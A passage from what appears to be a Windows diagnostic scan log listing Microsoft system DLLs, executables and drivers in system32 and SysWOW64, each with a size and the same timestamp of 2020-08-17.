2020-08-17 21:33 - 2020-08-17 21:33 - 000160256 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Internal.Devices.Sensors.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000159744 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.ApplicationModel.Core.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000159112 _____ (Microsoft Corporation) C:\Windows\system32\devobj.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000158208 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxdav.sys
2020-08-17 21:33 - 2020-08-17 21:33 - 000157184 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ComposableShellProxyStub.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000157184 _____ (Microsoft Corporation) C:\Windows\system32\RMapi.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000157184 _____ (Microsoft Corporation) C:\Windows\system32\PrintWSDAHost.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000156160 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Devices.Radios.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000155648 _____ (Microsoft Corporation) C:\Windows\SysWOW64\NPSM.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000155136 _____ (Microsoft Corporation) C:\Windows\SysWOW64\notepad.exe
2020-08-17 21:33 - 2020-08-17 21:33 - 000155136 _____ (Microsoft Corporation) C:\Windows\system32\Chakradiag.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000153912 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\AppvVfs.sys
2020-08-17 21:33 - 2020-08-17 21:33 - 000152064 _____ (Microsoft Corporation) C:\Windows\SysWOW64\useractivitybroker.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000151552 _____ (Microsoft Corporation) C:\Windows\system32\fdWSD.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000150528 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dmvdsitf.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000150336 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WerFaultSecure.exe
2020-08-17 21:33 - 2020-08-17 21:33 - 000149512 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ulib.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000148992 _____ (Microsoft Corporation) C:\Windows\SysWOW64\twext.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000148992 _____ (Microsoft Corporation) C:\Windows\system32\sdrsvc.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000148992 _____ (Microsoft Corporation) C:\Windows\system32\MDMAppInstaller.exe
2020-08-17 21:33 - 2020-08-17 21:33 - 000148992 _____ (Microsoft Corporation) C:\Windows\system32\iasnap.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000147968 _____ (Microsoft Corporation) C:\Windows\system32\Family.Client.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000147696 _____ (Microsoft Corporation) C:\Windows\system32\smss.exe
2020-08-17 21:33 - 2020-08-17 21:33 - 000146944 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wmidx.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000146744 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ksecdd.sys
2020-08-17 21:33 - 2020-08-17 21:33 - 000145920 _____ (Microsoft Corporation) C:\Windows\system32\wiadss.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000145720 _____ (Microsoft Corporation) C:\Windows\system32\microsoft-windows-kernel-processor-power-events.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000145208 _____ (Microsoft Corporation) C:\Windows\system32\CscMig.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000144896 _____ (Microsoft Corporation) C:\Windows\system32\TSpkg.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000144376 _____ (Microsoft Corporation) C:\Windows\system32\bcrypt.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000143872 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WsmAuto.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000143872 _____ (Microsoft Corporation) C:\Windows\SysWOW64\SpatialAudioLicenseSrv.exe
2020-08-17 21:33 - 2020-08-17 21:33 - 000143872 _____ (Microsoft Corporation) C:\Windows\SysWOW64\net1.exe
2020-08-17 21:33 - 2020-08-17 21:33 - 000143808 _____ (Microsoft Corporation) C:\Windows\SysWOW64\imm32.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000143360 _____ (Microsoft Corporation) C:\Windows\SysWOW64\easwrt.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000143160 _____ (Microsoft Corporation) C:\Windows\system32\NetSetupApi.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000141840 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\tm.sys
2020-08-17 21:33 - 2020-08-17 21:33 - 000141824 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Winlangdb.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000141312 _____ (Microsoft Corporation) C:\Windows\SysWOW64\PrintWorkflowService.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000141312 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\luafv.sys
2020-08-17 21:33 - 2020-08-17 21:33 - 000140800 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Energy.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000140800 _____ (Microsoft Corporation) C:\Windows\system32\mdmmigrator.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000140496 _____ (Microsoft Corporation) C:\Windows\system32\userenv.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000139952 _____ (Microsoft Corporation) C:\Windows\system32\MixedRealityRuntime.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000139776 _____ (Microsoft Corporation) C:\Windows\SysWOW64\sud.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000139776 _____ (Microsoft Corporation) C:\Windows\system32\Chakrathunk.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000139264 _____ (Microsoft Corporation) C:\Windows\SysWOW64\prntvpt.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000138752 _____ (Microsoft Corporation) C:\Windows\SysWOW64\t2embed.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000138752 _____ (Microsoft Corporation) C:\Windows\system32\DeviceMetadataRetrievalClient.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000138040 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\AppVStrm.sys
2020-08-17 21:33 - 2020-08-17 21:33 - 000137864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\devobj.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000137728 _____ (Microsoft Corporation) C:\Windows\system32\imapi.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000137216 _____ (Microsoft Corporation) C:\Windows\system32\pnpclean.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000136328 _____ (Microsoft Corporation) C:\Windows\SysWOW64\omadmapi.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000135680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Storage.Compression.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000133120 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iasrecst.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000132712 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Graphics.Display.BrightnessOverride.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000132608 _____ (Microsoft Corporation) C:\Windows\system32\SettingsHandlers_ForceSync.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000132408 _____ (Microsoft Corporation) C:\Windows\system32\offlinelsa.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000131584 _____ (Microsoft Corporation) C:\Windows\SysWOW64\fwbase.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000130560 _____ (Microsoft Corporation) C:\Windows\system32\StorageUsage.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000130112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dmcmnutils.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000129848 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mup.sys
2020-08-17 21:33 - 2020-08-17 21:33 - 000129600 _____ (Microsoft Corporation) C:\Windows\system32\gpapi.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000129088 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfps.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000128512 _____ (Microsoft Corporation) C:\Windows\system32\NetworkStatus.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000128512 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\tunnel.sys
2020-08-17 21:33 - 2020-08-17 21:33 - 000127488 _____ (Microsoft Corporation) C:\Windows\SysWOW64\fdWSD.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000127488 _____ (Microsoft Corporation) C:\Windows\system32\wkspbrokerAx.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000126464 _____ (Microsoft Corporation) C:\Windows\system32\WinHvPlatform.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000125952 _____ (Microsoft Corporation) C:\Windows\system32\fontsub.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000125440 _____ (Microsoft Corporation) C:\Windows\system32\sdshext.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000124928 _____ (Microsoft Corporation) C:\Windows\system32\wercplsupport.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000124928 _____ (Microsoft Corporation) C:\Windows\system32\DAMM.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000124512 _____ (Microsoft Corporation) C:\Windows\SysWOW64\KerbClientShared.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000123920 _____ (Microsoft Corporation) C:\Windows\system32\kdnet.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000123904 _____ (Microsoft Corporation) C:\Windows\system32\cryptcatsvc.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000123392 _____ (Microsoft Corporation) C:\Windows\SysWOW64\gamingtcui.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000122368 _____ (Microsoft Corporation) C:\Windows\system32\samlib.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000121856 _____ (Microsoft Corporation) C:\Windows\SysWOW64\PrintWSDAHost.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000121856 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msaatext.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000120560 _____ (Microsoft Corporation) C:\Windows\SysWOW64\profext.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000119808 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wiadss.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000119808 _____ (Microsoft Corporation) C:\Windows\system32\DafPrintProvider.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000119296 _____ (Microsoft Corporation) C:\Windows\system32\compstui.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000118784 _____ (Microsoft Corporation) C:\Windows\SysWOW64\TSpkg.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000118272 _____ (Microsoft Corporation) C:\Windows\SysWOW64\slc.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000117248 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Chakradiag.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000117048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\aadWamExtension.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000116904 _____ (Microsoft Corporation) C:\Windows\SysWOW64\userenv.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000116728 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rmclient.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000115712 _____ (Microsoft Corporation) C:\Windows\SysWOW64\oleprn.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000115712 _____ (Microsoft Corporation) C:\Windows\SysWOW64\AppointmentActivation.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000115712 _____ (Microsoft Corporation) C:\Windows\system32\MshtmlDac.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000114688 _____ (Microsoft Corporation) C:\Windows\SysWOW64\imapi.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000114176 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\agilevpn.sys
2020-08-17 21:33 - 2020-08-17 21:33 - 000114176 _____ (Microsoft Corporation) C:\Windows\system32\DeviceUpdateAgent.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000113160 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mountmgr.sys
2020-08-17 21:33 - 2020-08-17 21:33 - 000113152 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mssitlb.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000112640 _____ (Microsoft Corporation) C:\Windows\SysWOW64\VoipRT.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000112128 _____ (Microsoft Corporation) C:\Windows\system32\NetDriverInstall.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000112128 _____ (Microsoft Corporation) C:\Windows\system32\AxInstSv.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000110080 _____ C:\Windows\system32\ResBParser.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000109568 _____ (Microsoft Corporation) C:\Windows\system32\umpoext.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000109056 _____ C:\Windows\system32\RDVGHelper.exe
2020-08-17 21:33 - 2020-08-17 21:33 - 000108856 _____ (Microsoft Corporation) C:\Windows\system32\SecurityHealthProxyStub.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000108544 _____ (Microsoft Corporation) C:\Windows\system32\fdSSDP.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000108032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\socialapis.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000107832 _____ (Microsoft Corporation) C:\Windows\SysWOW64\NetSetupApi.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000107520 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Devices.SerialCommunication.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000107520 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iasnap.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000107520 _____ (Microsoft Corporation) C:\Windows\SysWOW64\GraphicsCapture.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000107008 _____ (Microsoft Corporation) C:\Windows\system32\CoreShellExtFramework.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000105984 _____ (Microsoft Corporation) C:\Windows\SysWOW64\drvsetup.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000105984 _____ (Microsoft Corporation) C:\Windows\system32\utcutil.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000105840 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MixedRealityRuntime.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000105832 _____ (Microsoft Corporation) C:\Windows\SysWOW64\OpenWith.exe
2020-08-17 21:33 - 2020-08-17 21:33 - 000105472 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Chakrathunk.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000105472 _____ (Microsoft Corporation) C:\Windows\system32\WorkFolders.exe
2020-08-17 21:33 - 2020-08-17 21:33 - 000105472 _____ (Microsoft Corporation) C:\Windows\system32\dfrgui.exe
2020-08-17 21:33 - 2020-08-17 21:33 - 000102760 _____ (Microsoft Corporation) C:\Windows\SysWOW64\profapi.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000101888 _____ (Microsoft Corporation) C:\Windows\SysWOW64\sppc.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000100864 _____ (Microsoft Corporation) C:\Windows\system32\Family.Authentication.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000100664 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\vmbkmcl.sys
2020-08-17 21:33 - 2020-08-17 21:33 - 000100352 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\cdfs.sys
2020-08-17 21:33 - 2020-08-17 21:33 - 000099840 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.System.Profile.RetailInfo.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000099712 _____ (Microsoft Corporation) C:\Windows\system32\FsIso.exe
2020-08-17 21:33 - 2020-08-17 21:33 - 000099328 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mapistub.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000099328 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mapi32.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000099328 _____ (Microsoft Corporation) C:\Windows\SysWOW64\fontsub.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000099104 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Graphics.Display.BrightnessOverride.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000098816 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wkspbrokerAx.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000098816 _____ (Microsoft Corporation) C:\Windows\SysWOW64\GameChatTranscription.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000098816 _____ (Microsoft Corporation) C:\Windows\system32\mfmjpegdec.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000098304 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000098104 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\crashdmp.sys
2020-08-17 21:33 - 2020-08-17 21:33 - 000097280 _____ (Microsoft Corporation) C:\Windows\SysWOW64\compstui.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000097280 _____ (Microsoft Corporation) C:\Windows\system32\fveskybackup.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000097080 _____ (Microsoft Corporation) C:\Windows\system32\rdpudd.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000096768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\globinputhost.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000096256 _____ (Microsoft Corporation) C:\Windows\system32\winsrvext.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000096032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\bcrypt.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000095232 _____ (Microsoft Corporation) C:\Windows\system32\msfeedsbs.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000094720 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Utilman.exe
2020-08-17 21:33 - 2020-08-17 21:33 - 000094720 _____ (Microsoft Corporation) C:\Windows\SysWOW64\CameraCaptureUI.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000094208 _____ (Microsoft Corporation) C:\Windows\SysWOW64\EaseOfAccessDialog.exe
2020-08-17 21:33 - 2020-08-17 21:33 - 000094208 _____ (Microsoft Corporation) C:\Windows\system32\mcbuilder.exe
2020-08-17 21:33 - 2020-08-17 21:33 - 000093712 _____ (Microsoft Corporation) C:\Windows\system32\hvloader.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000093448 _____ (Microsoft Corporation) C:\Windows\system32\devenum.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000093184 _____ (Microsoft Corporation) C:\Windows\system32\nlaapi.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000093104 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\dumpfve.sys
2020-08-17 21:33 - 2020-08-17 21:33 - 000092672 _____ (Microsoft Corporation) C:\Windows\system32\EnterpriseDesktopAppMgmtCSP.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000092672 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\wanarp.sys
2020-08-17 21:33 - 2020-08-17 21:33 - 000092672 _____ (Microsoft Corporation) C:\Windows\system32\dhcpcsvc.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000091136 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Security.Credentials.UI.UserConsentVerifier.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000091136 _____ (Microsoft Corporation) C:\Windows\system32\CompMgmtLauncher.exe
2020-08-17 21:33 - 2020-08-17 21:33 - 000090936 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.StateRepositoryBroker.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000090624 _____ (Microsoft Corporation) C:\Windows\system32\keyiso.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000090112 _____ (Microsoft Corporation) C:\Windows\system32\srmlib.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000089600 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.ApplicationModel.Background.SystemEventsBroker.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000089600 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dfrgui.exe
2020-08-17 21:33 - 2020-08-17 21:33 - 000089328 _____ (Microsoft Corporation) C:\Windows\SysWOW64\win32u.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000089088 _____ (Microsoft Corporation) C:\Windows\system32\asycfilt.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000088576 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.AI.MachineLearning.Preview.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000088576 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MshtmlDac.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000088576 _____ (Microsoft Corporation) C:\Windows\SysWOW64\fdSSDP.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000088576 _____ (Microsoft Corporation) C:\Windows\SysWOW64\DafPrintProvider.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000088064 _____ (Microsoft Corporation) C:\Windows\SysWOW64\olepro32.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000087552 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dot3api.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000087552 _____ (Microsoft Corporation) C:\Windows\system32\rdpsign.exe
2020-08-17 21:33 - 2020-08-17 21:33 - 000087048 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\npfs.sys
2020-08-17 21:33 - 2020-08-17 21:33 - 000087040 _____ (Microsoft Corporation) C:\Windows\SysWOW64\PeopleAPIs.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000087040 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dot3msm.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000087040 _____ (Microsoft Corporation) C:\Windows\system32\iasacct.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000086528 _____ (Microsoft Corporation) C:\Windows\SysWOW64\AcXtrnal.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000086272 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Security.Credentials.UI.CredentialPicker.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000086016 _____ (Microsoft Corporation) C:\Windows\system32\WwanRadioManager.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000086016 _____ (Microsoft Corporation) C:\Windows\system32\tdc.ocx
2020-08-17 21:33 - 2020-08-17 21:33 - 000084488 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\winhvr.sys
2020-08-17 21:33 - 2020-08-17 21:33 - 000084480 _____ (Microsoft Corporation) C:\Windows\system32\enterpriseresourcemanager.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000084280 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\hvservice.sys
2020-08-17 21:33 - 2020-08-17 21:33 - 000083968 _____ (Microsoft Corporation) C:\Windows\system32\wiarpc.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000083600 _____ (Microsoft Corporation) C:\Windows\SysWOW64\devenum.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000083456 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfmjpegdec.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000083456 _____ (Microsoft Corporation) C:\Windows\system32\wscui.cpl
2020-08-17 21:33 - 2020-08-17 21:33 - 000083456 _____ (Microsoft Corporation) C:\Windows\system32\wpdbusenum.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000083456 _____ (Microsoft Corporation) C:\Windows\system32\Microsoft.Uev.SyncController.exe
2020-08-17 21:33 - 2020-08-17 21:33 - 000082432 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Networking.ServiceDiscovery.Dnssd.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000082432 _____ (Microsoft Corporation) C:\Windows\system32\rdvvmtransport.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000081408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dtdump.exe
2020-08-17 21:33 - 2020-08-17 21:33 - 000081408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\atl.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000081408 _____ (Microsoft Corporation) C:\Windows\system32\Print.Workflow.Source.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000080896 _____ (Microsoft Corporation) C:\Windows\SysWOW64\NetDriverInstall.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000080896 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mcbuilder.exe
2020-08-17 21:33 - 2020-08-17 21:33 - 000080896 _____ (Microsoft Corporation) C:\Windows\SysWOW64\BcastDVRBroker.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000080384 _____ (Microsoft Corporation) C:\Windows\system32\RpcEpMap.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000079872 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeedsbs.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000079360 _____ (Microsoft Corporation) C:\Windows\SysWOW64\sethc.exe
2020-08-17 21:33 - 2020-08-17 21:33 - 000079360 _____ (Microsoft Corporation) C:\Windows\system32\usp10.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000078848 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmled.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000078848 _____ (Microsoft Corporation) C:\Windows\system32\ProvSysprep.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000078848 _____ (Microsoft Corporation) C:\Windows\system32\offreg.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000078848 _____ (Microsoft Corporation) C:\Windows\system32\ComputerDefaults.exe
2020-08-17 21:33 - 2020-08-17 21:33 - 000077824 _____ (Microsoft Corporation) C:\Windows\SysWOW64\usp10.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000077824 _____ (Microsoft Corporation) C:\Windows\SysWOW64\usoapi.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000077824 _____ (Microsoft Corporation) C:\Windows\system32\iasads.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000077312 _____ (Microsoft Corporation) C:\Windows\system32\TSSessionUX.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000075776 _____ (Microsoft Corporation) C:\Windows\SysWOW64\DiagnosticInvoker.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000075264 _____ (Microsoft Corporation) C:\Windows\system32\Groupinghc.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000074752 _____ (Microsoft Corporation) C:\Windows\SysWOW64\asycfilt.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000074240 _____ (Microsoft Corporation) C:\Windows\system32\reg.exe
2020-08-17 21:33 - 2020-08-17 21:33 - 000073024 _____ (Microsoft Corporation) C:\Windows\SysWOW64\remoteaudioendpoint.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000072704 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tzautoupdate.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000072704 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tdc.ocx
2020-08-17 21:33 - 2020-08-17 21:33 - 000072704 _____ (Microsoft Corporation) C:\Windows\system32\lpkinstall.exe
2020-08-17 21:33 - 2020-08-17 21:33 - 000072704 _____ (Microsoft Corporation) C:\Windows\system32\efsext.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000072192 _____ (Microsoft Corporation) C:\Windows\system32\PrintBrmUi.exe
2020-08-17 21:33 - 2020-08-17 21:33 - 000071680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Devices.Custom.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000071680 _____ (Microsoft Corporation) C:\Windows\system32\lpremove.exe
2020-08-17 21:33 - 2020-08-17 21:33 - 000071168 _____ (Microsoft Corporation) C:\Windows\system32\MiracastReceiverExt.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000070656 _____ (Microsoft Corporation) C:\Windows\system32\Microsoft.Uev.Common.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000070144 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dhcpcsvc.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000068608 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mbussdapi.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000068408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\DeviceReactivation.dll
